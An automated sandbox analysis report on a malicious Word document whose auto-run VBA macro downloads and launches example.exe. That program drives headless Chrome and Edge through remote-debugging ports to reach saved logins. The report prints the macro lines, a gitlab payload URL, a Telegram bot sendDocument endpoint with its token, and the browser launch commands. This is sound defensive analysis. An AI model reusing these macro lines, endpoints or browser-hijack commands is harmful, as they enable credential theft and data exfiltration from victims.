    Source: chrome.exe, 0000000E.00000002.3426711483.000033A800434000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000E.00000002.3426477434.000033A8003DC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000E.00000002.3424948512.000033A80000C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000E.00000002.3426410003.000033A8003C1000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000010.00000002.3519634036.00003A84002DC000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000010.00000003.3455872624.00003A84002C8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000010.00000002.3519286006.00003A8400288000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://anglebug.com/7369
    Source: chrome.exe, 0000000E.00000002.3426477434.000033A8003DC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000E.00000002.3424948512.000033A80000C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000E.00000002.3426410003.000033A8003C1000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000010.00000002.3519634036.00003A84002DC000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000010.00000003.3455872624.00003A84002C8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000010.00000002.3519286006.00003A8400288000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://anglebug.com/7382
    Source: chrome.exe, 0000000E.00000002.3426711483.000033A800434000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000E.00000002.3426477434.000033A8003DC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000E.00000002.3426410003.000033A8003C1000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000010.00000002.3519634036.00003A84002DC000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000010.00000003.3455872624.00003A84002C8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000010.00000002.3519286006.00003A8400288000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://anglebug.com/7489
    Source: chrome.exe, 0000000E.00000002.3426711483.000033A800434000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000E.00000002.3426477434.000033A8003DC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000E.00000002.3426410003.000033A8003C1000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000010.00000002.3519634036.00003A84002DC000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000010.00000003.3455872624.00003A84002C8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000010.00000002.3519286006.00003A8400288000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://anglebug.com/7604
    Source: chrome.exe, 0000000E.00000002.3426711483.000033A800434000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000E.00000002.3426477434.000033A8003DC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000E.00000002.3426410003.000033A8003C1000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000010.00000002.3519634036.00003A84002DC000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000010.00000003.3455872624.00003A84002C8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000010.00000002.3519286006.00003A8400288000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://anglebug.com/7714
    Source: chrome.exe, 0000000E.00000002.3426711483.000033A800434000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000E.00000002.3426477434.000033A8003DC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000E.00000002.3426410003.000033A8003C1000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000010.00000002.3519634036.00003A84002DC000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000010.00000003.3455872624.00003A84002C8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000010.00000002.3519286006.00003A8400288000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://anglebug.com/7847
    Source: chrome.exe, 0000000E.00000002.3426477434.000033A8003DC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000E.00000002.3424948512.000033A80000C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000E.00000002.3426410003.000033A8003C1000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000010.00000002.3519634036.00003A84002DC000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000010.00000003.3455872624.00003A84002C8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000010.00000002.3519286006.00003A8400288000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://anglebug.com/7899
    Source: example.exe, 0000000C.00000002.3645897805.0000019641C92000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://api.ipify.org
    Source: example.exe, 0000000C.00000002.3645791369.0000019641400000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://api.ipify.org:L
    Source: example.exe, 0000000C.00000002.3645897805.0000019641C92000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://api.ipify.orgP
    Source: example.exe, 0000000C.00000002.3645791369.0000019641400000.00000004.00001000.00020000.00000000.sdmp, example.exe, 0000000C.00000002.3645897805.0000019641D58000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot
    Source: example.exe, 0000000C.00000002.3645897805.0000019641D58000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot6408760648:AAHZHh7YT7kusTgJi5VULHYIyPQmN5QDENw/sendDocument
    Source: example.exe, 0000000C.00000002.3645897805.0000019641D58000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/botP
    Source: chrome.exe, 0000000E.00000003.3332529151.000060A4002D8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000E.00000003.3332551904.000060A4002E4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://clients2.google.com/cr/report
    Source: example.exe, 0000000C.00000002.3647342033.000001D6D44D0000.00000004.10000000.00040000.00000000.sdmp, example.exe, 0000000C.00000002.3645471398.000001963F300000.00000004.10000000.00040000.00000000.sdmp, example.exe, 0000000C.00000002.3647199618.000001D6D4420000.00000004.10000000.00040000.00000000.sdmp, example.exe, 0000000C.00000002.3647121204.000001D6D43E1000.00000020.00001000.00020000.00000000.sdmp, example.exe, 0000000C.00000002.3648414415.000001D6D51F0000.00000004.10000000.00040000.00000000.sdmp, example.exe, 0000000C.00000002.3645137007.000001963DAD0000.00000004.10000000.00040000.00000000.sdmp, example.exe, 0000000C.00000002.3648255484.000001D6D5180000.00000004.10000000.00040000.00000000.sdmp, example.exe, 0000000C.00000002.3648674007.000001D6D5220000.00000004.10000000.00040000.00000000.sdmp, example.exe, 0000000C.00000002.3647038849.000001D6D4390000.00000004.10000000.00040000.00000000.sdmp, example.exe, 0000000C.00000002.3648371388.000001D6D51D0000.00000004.10000000.00040000.00000000.sdmp, example.exe, 0000000C.00000002.3648814958.000001D6D5280000.00000004.00000020.00020000.00000000.sdmp, example.exe, 0000000C.00000002.3645558187.000001963F311000.00000020.00001000.00020000.00000000.sdmp, example.exe, 0000000C.00000002.3648304673.000001D6D51A1000.00000020.00001000.00020000.00000000.sdmp, example.exe, 0000000C.00000002.3647262031.000001D6D4481000.00000020.00001000.00020000.00000000.sdmp, example.exe, 0000000C.00000002.3644724065.000001963D9F0000.00000004.10000000.00040000.00000000.sdmp, example.exe, 0000000C.00000002.3647010977.000001D6D4370000.00000004.10000000.00040000.00000000.sdmp, example.exe, 0000000C.00000002.3648392319.000001D6D51E0000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://github.com/dotnet/runtime
    Source: example.exe, 0000000C.00000002.3647365341.000001D6D44E0000.00000004.10000000.00040000.00000000.sdmp, example.exe, 0000000C.00000002.3648900484.000001D6D5381000.00000020.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/dotnet/runtime/blob/bbc898f3e5678135b242faeb6eefd8b24bf04f3c/src/native/corehost/
    Source: example.exe, 0000000C.00000002.3647365341.000001D6D44E0000.00000004.10000000.00040000.00000000.sdmp, example.exe, 0000000C.00000002.3648900484.000001D6D5381000.00000020.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/dotnet/runtime/issues/71847
    Source: example.exe, 0000000C.00000002.3647365341.000001D6D44E0000.00000004.10000000.00040000.00000000.sdmp, example.exe, 0000000C.00000002.3648900484.000001D6D5381000.00000020.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/mono/linker/issues/378
    Source: example.exe, 0000000C.00000002.3647365341.000001D6D44E0000.00000004.10000000.00040000.00000000.sdmp, example.exe, 0000000C.00000002.3648900484.000001D6D5381000.00000020.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/mono/linker/pull/649
    Source: q9JZUaS1Gy.docString found in binary or memory: https://gitlab.com/app8490744/updatesa/-/raw/main/up$
    Source: q9JZUaS1Gy.docString found in binary or memory: https://gitlab.com/app8490744/updatesa/-/raw/main/up$v
    Source: msedge.exe, 00000010.00000003.3455872624.00003A84002C8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://issuetracker.google.com/161903006
    Source: msedge.exe, 00000010.00000003.3455872624.00003A84002C8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://issuetracker.google.com/166809097
    Source: msedge.exe, 00000010.00000003.3455872624.00003A84002C8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://issuetracker.google.com/184850002
    Source: msedge.exe, 00000010.00000003.3455872624.00003A84002C8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://issuetracker.google.com/187425444
    Source: msedge.exe, 00000010.00000003.3455872624.00003A84002C8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://issuetracker.google.com/220069903
    Source: msedge.exe, 00000010.00000003.3455872624.00003A84002C8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://issuetracker.google.com/229267970
    Source: msedge.exe, 00000010.00000003.3455872624.00003A84002C8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://issuetracker.google.com/250706693
    Source: msedge.exe, 00000010.00000003.3455872624.00003A84002C8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://issuetracker.google.com/253522366
    Source: msedge.exe, 00000010.00000003.3455872624.00003A84002C8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://issuetracker.google.com/255411748
    Source: msedge.exe, 00000010.00000003.3455872624.00003A84002C8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://issuetracker.google.com/258207403
    Source: msedge.exe, 00000010.00000003.3455872624.00003A84002C8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://issuetracker.google.com/274859104
    Source: msedge.exe, 00000010.00000003.3455872624.00003A84002C8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://issuetracker.google.com/284462263
    Source: msedge.exe, 00000010.00000003.3455872624.00003A84002C8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000010.00000002.3517356481.00003A840002C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://issuetracker.google.com/issues/166475273
    Source: example.exe, 0000000C.00000002.3645394042.000001963F290000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://sectigo.com/CPS0
    Source: msedge.exe, 00000010.00000002.3518254671.00003A8400110000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.catcert.net/verarrel
    Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49733
    Source: unknownNetwork traffic detected: HTTP traffic on port 49734 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49713 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49739
    Source: unknownNetwork traffic detected: HTTP traffic on port 49736 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49737
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49736
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49713
    Source: unknownNetwork traffic detected: HTTP traffic on port 49737 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49734
    Source: unknownNetwork traffic detected: HTTP traffic on port 49739 -> 443
    Source: unknownHTTPS traffic detected: 172.65.251.78:443 -> 192.168.2.10:49713 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 104.26.13.205:443 -> 192.168.2.10:49733 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.10:49739 version: TLS 1.2

    System Summary

    barindex
    Document contains an embedded VBA macro which may execute processes
    Source: q9JZUaS1Gy.docOLE, VBA macro line: shell.Run """" & savePath & """", 1, False
    Source: q9JZUaS1Gy.docOLE, VBA macro line: shell.ShellExecute vbsFilePath, "", "", "open", 0
    Source: ~WRD0000.tmp.0.drOLE, VBA macro line: shell.Run """" & savePath & """", 1, False
    Source: ~WRD0000.tmp.0.drOLE, VBA macro line: shell.ShellExecute vbsFilePath, "", "", "open", 0
    Document contains an embedded VBA macro with suspicious strings
    Source: q9JZUaS1Gy.docOLE, VBA macro line: savePath = Environ("USERPROFILE") & "\Documents\example.exe" ' u?ng d?n luu file
    Source: q9JZUaS1Gy.docOLE, VBA macro line: Set shell = CreateObject("WScript.Shell")
    Source: q9JZUaS1Gy.docOLE, VBA macro line: Private Declare PtrSafe Sub CopyMemory Lib "kernel32" Alias "RtlMoveMemory" (lpvDest As Any, lpvSource As Any, ByVal cbCopy As LongPtr)
    Source: q9JZUaS1Gy.docOLE, VBA macro line: Private Declare Sub CopyMemory Lib "kernel32" Alias "RtlMoveMemory" (lpvDest As Any, lpvSource As Any, ByVal cbCopy As LongPtr)
    Source: q9JZUaS1Gy.docOLE, VBA macro line: Private Declare PtrSafe Function WideCharToMultiByte Lib "kernel32" (ByVal CodePage As Long, ByVal dwFlags As Long, ByVal lpWideCharStr As LongPtr, ByVal cchWideChar As Long, lpMultiByteStr As Any, ByVal cchMultiByte As Long, ByVal lpDefaultChar As LongPtr, ByVal lpUsedDefaultChar As LongPtr) As Long
    Source: q9JZUaS1Gy.docOLE, VBA macro line: Private Declare PtrSafe Function MultiByteToWideChar Lib "kernel32" (ByVal CodePage As Long, ByVal dwFlags As Long, lpMultiByteStr As Any, ByVal cchMultiByte As Long, ByVal lpWideCharStr As LongPtr, ByVal cchWideChar As Long) As Long
    Source: q9JZUaS1Gy.docOLE, VBA macro line: Private Declare PtrSafe Function FormatMessage Lib "kernel32" Alias "FormatMessageA" (ByVal dwFlags As Long, ByVal lpSource As LongPtr, ByVal dwMessageId As Long, ByVal dwLanguageId As Long, ByVal lpBuffer As String, ByVal nSize As Long, ByVal Args As LongPtr) As Long
    Source: q9JZUaS1Gy.docOLE, VBA macro line: Private Declare Function WideCharToMultiByte Lib "kernel32" (ByVal CodePage As Long, ByVal dwFlags As Long, ByVal lpWideCharStr As LongPtr, ByVal cchWideChar As Long, lpMultiByteStr As Any, ByVal cchMultiByte As Long, ByVal lpDefaultChar As LongPtr, ByVal lpUsedDefaultChar As LongPtr) As Long
    Source: q9JZUaS1Gy.docOLE, VBA macro line: Private Declare Function MultiByteToWideChar Lib "kernel32" (ByVal CodePage As Long, ByVal dwFlags As Long, lpMultiByteStr As Any, ByVal cchMultiByte As Long, ByVal lpWideCharStr As LongPtr, ByVal cchWideChar As Long) As Long
    Source: q9JZUaS1Gy.docOLE, VBA macro line: Private Declare Function FormatMessage Lib "kernel32" Alias "FormatMessageA" (ByVal dwFlags As Long, ByVal lpSource As LongPtr, ByVal dwMessageId As Long, ByVal dwLanguageId As Long, ByVal lpBuffer As String, ByVal nSize As Long, ByVal Args As LongPtr) As Long
    Source: q9JZUaS1Gy.docOLE, VBA macro line: vbsFilePath = Environ("USERPROFILE") & "\Documents\WindowServices.vbs"
    Source: q9JZUaS1Gy.docOLE, VBA macro line: shell.ShellExecute vbsFilePath, "", "", "open", 0
    Source: ~WRD0000.tmp.0.drOLE, VBA macro line: savePath = Environ("USERPROFILE") & "\Documents\example.exe" ' u?ng d?n luu file
    Source: ~WRD0000.tmp.0.drOLE, VBA macro line: Set shell = CreateObject("WScript.Shell")
    Source: ~WRD0000.tmp.0.drOLE, VBA macro line: Private Declare PtrSafe Sub CopyMemory Lib "kernel32" Alias "RtlMoveMemory" (lpvDest As Any, lpvSource As Any, ByVal cbCopy As LongPtr)
    Source: ~WRD0000.tmp.0.drOLE, VBA macro line: Private Declare Sub CopyMemory Lib "kernel32" Alias "RtlMoveMemory" (lpvDest As Any, lpvSource As Any, ByVal cbCopy As LongPtr)
    Source: ~WRD0000.tmp.0.drOLE, VBA macro line: Private Declare PtrSafe Function WideCharToMultiByte Lib "kernel32" (ByVal CodePage As Long, ByVal dwFlags As Long, ByVal lpWideCharStr As LongPtr, ByVal cchWideChar As Long, lpMultiByteStr As Any, ByVal cchMultiByte As Long, ByVal lpDefaultChar As LongPtr, ByVal lpUsedDefaultChar As LongPtr) As Long
    Source: ~WRD0000.tmp.0.drOLE, VBA macro line: Private Declare PtrSafe Function MultiByteToWideChar Lib "kernel32" (ByVal CodePage As Long, ByVal dwFlags As Long, lpMultiByteStr As Any, ByVal cchMultiByte As Long, ByVal lpWideCharStr As LongPtr, ByVal cchWideChar As Long) As Long
    Source: ~WRD0000.tmp.0.drOLE, VBA macro line: Private Declare PtrSafe Function FormatMessage Lib "kernel32" Alias "FormatMessageA" (ByVal dwFlags As Long, ByVal lpSource As LongPtr, ByVal dwMessageId As Long, ByVal dwLanguageId As Long, ByVal lpBuffer As String, ByVal nSize As Long, ByVal Args As LongPtr) As Long
    Source: ~WRD0000.tmp.0.drOLE, VBA macro line: Private Declare Function WideCharToMultiByte Lib "kernel32" (ByVal CodePage As Long, ByVal dwFlags As Long, ByVal lpWideCharStr As LongPtr, ByVal cchWideChar As Long, lpMultiByteStr As Any, ByVal cchMultiByte As Long, ByVal lpDefaultChar As LongPtr, ByVal lpUsedDefaultChar As LongPtr) As Long
    Source: ~WRD0000.tmp.0.drOLE, VBA macro line: Private Declare Function MultiByteToWideChar Lib "kernel32" (ByVal CodePage As Long, ByVal dwFlags As Long, lpMultiByteStr As Any, ByVal cchMultiByte As Long, ByVal lpWideCharStr As LongPtr, ByVal cchWideChar As Long) As Long
    Source: ~WRD0000.tmp.0.drOLE, VBA macro line: Private Declare Function FormatMessage Lib "kernel32" Alias "FormatMessageA" (ByVal dwFlags As Long, ByVal lpSource As LongPtr, ByVal dwMessageId As Long, ByVal dwLanguageId As Long, ByVal lpBuffer As String, ByVal nSize As Long, ByVal Args As LongPtr) As Long
    Source: ~WRD0000.tmp.0.drOLE, VBA macro line: vbsFilePath = Environ("USERPROFILE") & "\Documents\WindowServices.vbs"
    Source: ~WRD0000.tmp.0.drOLE, VBA macro line: shell.ShellExecute vbsFilePath, "", "", "open", 0
    Document contains an embedded VBA with functions possibly related to HTTP operations
    Source: q9JZUaS1Gy.docStream path 'Macros/VBA/Module2' : found possibly 'XMLHttpRequest' functions response, responsetext, status, open, send
    Source: ~WRD0000.tmp.0.drStream path 'Macros/VBA/Module2' : found possibly 'XMLHttpRequest' functions response, responsetext, status, open, send
    Office process drops PE file
    Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEFile created: C:\Users\user\Documents\example.exeJump to dropped file
    Office process queries suspicious COM object (likely to drop second stage)
    Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXECOM Object queried: XML HTTP HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{F6D90F16-9C73-11D3-B32E-00C04F990BB4}\InProcServer32Jump to behavior
    Source: q9JZUaS1Gy.docOLE, VBA macro line: Private Sub Document_Open()
    Source: ~WRD0000.tmp.0.drOLE, VBA macro line: Private Sub Document_Open()
    Source: q9JZUaS1Gy.docOLE indicator, VBA macros: true
    Source: ~WRD0000.tmp.0.drOLE indicator, VBA macros: true
    Source: example.exe.0.drStatic PE information: Resource name: RT_RCDATA type: PE32+ executable (DLL) (GUI) x86-64, for MS Windows
    Source: C:\Users\user\Documents\example.exeKey value queried: HKEY_CURRENT_USER\SOFTWARE\Google\Chrome\BLBeacon versionJump to behavior
    Source: C:\Users\user\Documents\example.exeKey value queried: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Edge\BLBeacon versionJump to behavior
    Source: classification engineClassification label: mal100.troj.spyw.expl.evad.winDOC@17/16@4/5
    Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEFile created: C:\Users\user\Desktop\~$JZUaS1Gy.docJump to behavior
    Source: C:\Users\user\Documents\example.exeMutant created: NULL
    Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEFile created: C:\Users\user\AppData\Local\Temp\{D96AD20C-09DF-4A9C-ADA1-73AEA8D93F60} - OProcSessId.datJump to behavior
    Source: q9JZUaS1Gy.docOLE indicator, Word Document stream: true
    Source: ~WRD0000.tmp.0.drOLE indicator, Word Document stream: true
    Source: q9JZUaS1Gy.docOLE document summary: title field not present or empty
    Source: ~WRD0000.tmp.0.drOLE document summary: title field not present or empty
    Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEFile read: C:\Users\desktop.iniJump to behavior
    Source: C:\Users\user\Documents\example.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
    Source: unknownProcess created: C:\Windows\System32\rundll32.exe C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
    Source: Default_LoginDataTemp.db.12.dr, tmpti2rqj.tmp.12.dr, tmpfwky0w.tmp.12.dr, tmp2ff1sv.tmp.12.drBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
    Source: q9JZUaS1Gy.docVirustotal: Detection: 53%
    Source: q9JZUaS1Gy.docReversingLabs: Detection: 39%
    Source: unknownProcess created: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE "C:\Program Files (x86)\Microsoft Office\Root\Office16\WINWORD.EXE" /Automation -Embedding
    Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess created: C:\Users\user\Documents\example.exe "C:\Users\user\Documents\example.exe"
    Source: C:\Users\user\Documents\example.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9671 --user-data-dir="C:\Users\user\AppData\Local\Google\Chrome\User Data" --profile-directory="Default" --disable-popup-blocking --disable-extensions --headless --disable-dev-shm-usage --no-sandbox
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --no-sandbox --use-angle=swiftshader-webgl --use-gl=angle --headless --mojo-platform-channel-handle=1596 --field-trial-handle=1428,i,3801852905394736153,15773183459948505587,262144 --disable-features=PaintHolding /prefetch:8
    Source: C:\Users\user\Documents\example.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9440 --user-data-dir="C:\Users\user\AppData\Local\Microsoft\Edge\User Data" --profile-directory="Default" --disable-popup-blocking --disable-extensions --headless --disable-dev-shm-usage --no-sandbox
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --no-sandbox --use-angle=swiftshader-webgl --use-gl=angle --headless --mojo-platform-channel-handle=1596 --field-trial-handle=1452,i,15901008811036505322,11518475085640953026,262144 --disable-features=PaintHolding /prefetch:3
    Source: unknownProcess created: C:\Windows\System32\rundll32.exe C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
    Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess created: unknown unknownJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess created: C:\Users\user\Documents\example.exe "C:\Users\user\Documents\example.exe" Jump to behavior
    Source: C:\Users\user\Documents\example.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9671 --user-data-dir="C:\Users\user\AppData\Local\Google\Chrome\User Data" --profile-directory="Default" --disable-popup-blocking --disable-extensions --headless --disable-dev-shm-usage --no-sandboxJump to behavior
    Source: C:\Users\user\Documents\example.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9440 --user-data-dir="C:\Users\user\AppData\Local\Microsoft\Edge\User Data" --profile-directory="Default" --disable-popup-blocking --disable-extensions --headless --disable-dev-shm-usage --no-sandboxJump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --no-sandbox --use-angle=swiftshader-webgl --use-gl=angle --headless --mojo-platform-channel-handle=1596 --field-trial-handle=1428,i,3801852905394736153,15773183459948505587,262144 --disable-features=PaintHolding /prefetch:8Jump to behavior
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --no-sandbox --use-angle=swiftshader-webgl --use-gl=angle --headless --mojo-platform-channel-handle=1596 --field-trial-handle=1452,i,15901008811036505322,11518475085640953026,262144 --disable-features=PaintHolding /prefetch:3Jump to behavior
    Source: C:\Users\user\Documents\example.exeSection loaded: apphelp.dllJump to behavior
    Source: C:\Users\user\Documents\example.exeSection loaded: kernel.appcore.dllJump to behavior
    Source: C:\Users\user\Documents\example.exeSection loaded: icu.dllJump to behavior
    Source: C:\Users\user\Documents\example.exeSection loaded: windows.storage.dllJump to behavior
    Source: C:\Users\user\Documents\example.exeSection loaded: wldp.dllJump to behavior
    Source: C:\Users\user\Documents\example.exeSection loaded: iphlpapi.dllJump to behavior
    Source: C:\Users\user\Documents\example.exeSection loaded: dnsapi.dllJump to behavior
    Source: C:\Users\user\Documents\example.exeSection loaded: dhcpcsvc6.dllJump to behavior
    Source: C:\Users\user\Documents\example.exeSection loaded: dhcpcsvc.dllJump to behavior
    Source: C:\Users\user\Documents\example.exeSection loaded: winnsi.dllJump to behavior
    Source: C:\Users\user\Documents\example.exeSection loaded: winhttp.dllJump to behavior
    Source: C:\Users\user\Documents\example.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
    Source: C:\Users\user\Documents\example.exeSection loaded: mswsock.dllJump to behavior
    Source: C:\Users\user\Documents\example.exeSection loaded: wshunix.dllJump to behavior
    Source: C:\Users\user\Documents\example.exeSection loaded: winrnr.dllJump to behavior
    Source: C:\Users\user\Documents\example.exeSection loaded: rasadhlp.dllJump to behavior
    Source: C:\Users\user\Documents\example.exeSection loaded: nlaapi.dllJump to behavior
    Source: C:\Users\user\Documents\example.exeSection loaded: wshbth.dllJump to behavior
    Source: C:\Users\user\Documents\example.exeSection loaded: devobj.dllJump to behavior
    Source: C:\Users\user\Documents\example.exeSection loaded: napinsp.dllJump to behavior
    Source: C:\Users\user\Documents\example.exeSection loaded: fwpuclnt.dllJump to behavior
    Source: C:\Users\user\Documents\example.exeSection loaded: pnrpnsp.dllJump to behavior
    Source: C:\Users\user\Documents\example.exeSection loaded: dpapi.dllJump to behavior
    Source: C:\Users\user\Documents\example.exeSection loaded: cryptbase.dllJump to behavior
    Source: C:\Users\user\Documents\example.exeSection loaded: ntmarta.dllJump to behavior
    Source: C:\Users\user\Documents\example.exeSection loaded: sqlite.interop.dllJump to behavior
    Source: C:\Users\user\Documents\example.exeSection loaded: sqlite.interop.dllJump to behavior
    Source: C:\Users\user\Documents\example.exeSection loaded: sqlite.interop.dllJump to behavior
    Source: C:\Users\user\Documents\example.exeSection loaded: sqlite.interop.dllJump to behavior
    Source: C:\Users\user\Documents\example.exeSection loaded: sqlite.interop.dllJump to behavior
    Source: C:\Users\user\Documents\example.exeSection loaded: sqlite.interop.dllJump to behavior
    Source: C:\Users\user\Documents\example.exeSection loaded: sspicli.dllJump to behavior
    Source: C:\Users\user\Documents\example.exeSection loaded: schannel.dllJump to behavior
